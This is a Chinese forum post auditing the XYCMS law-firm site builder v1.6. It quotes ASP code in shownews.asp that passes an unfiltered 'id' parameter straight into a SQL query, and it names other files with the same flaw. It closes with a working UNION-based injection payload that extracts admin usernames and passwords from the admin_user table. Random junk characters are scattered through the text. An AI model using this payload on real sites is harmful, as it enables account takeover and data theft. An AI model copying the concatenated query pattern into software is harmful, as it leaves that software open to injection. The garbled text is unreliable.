前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
1 Y% h# e, ~2 w3 ?2 S% u/ z( Y3 c
/ x/ O' n5 Z- i) Z6 j4 J& X1 D淫荡分割线
' K1 t9 s+ j1 Y3 p5 s# y3 p/ P2 _+ a$ P--------------------------------------------------------
, Q7 W. q3 o( Q- D4 m/ h
( v9 _" F# S0 i3 c% E6 { b+ l审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)/ w4 {7 m0 @: q7 m7 ]
源码地址:http://down.chinaz.com/soft/29233.htm
6 y) {) X& @* u: X
5 L$ d, _0 Y; R8 A, i漏洞文件:shownews.asp
5 ?( G5 g& z# O& `3 o$ J漏洞代码:7-13行
# t3 B: t, W1 E0 y3 Y; v' z% @* p, z
. N3 z: t7 ~5 [' z& [$ m
* }: L! a. E2 m/ v+ p4 \ z<% 8 W7 \0 ]$ G+ ~
id=request.QueryString("id")
0 k, B0 h' V* t n1 L
' O6 W1 L+ u7 J/ P( Dset snews=server.createobject("adodb.recordset")
; A1 U5 {8 G/ Z8 x& Nexec="select * from [news] where id="&id8 V* H8 {/ M& {/ S
snews.open exec,conn,1,1% G1 L+ [2 J- B) F' l" E
%>
1 d: W& }0 ^- @& D
, W0 E: q$ ~1 ]# r8 k. l& \9 ] & n# Y' R6 s- n. g
什么过滤都没有 直造成注入* e" r" m5 b/ b2 R7 m( V# q
7 P4 W) P2 k; V2 t注入点:http://127.0.0.1:99/shownews.asp?id=xx
, q8 z' Z. W; n9 O5 n \) |7 K( o3 |- u7 g2 r
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找# Z* c: w, Z8 t# m
# u/ T4 @( Q# Z) o& |1 x: p 6 C; U* G% }( f6 _5 P4 d
exp: union select 1,admin,password,4,5,7 from admin_user( R; [6 R- L3 s: G" B( y! X( {
1 q! j6 U, h1 @# G$ t3 L
|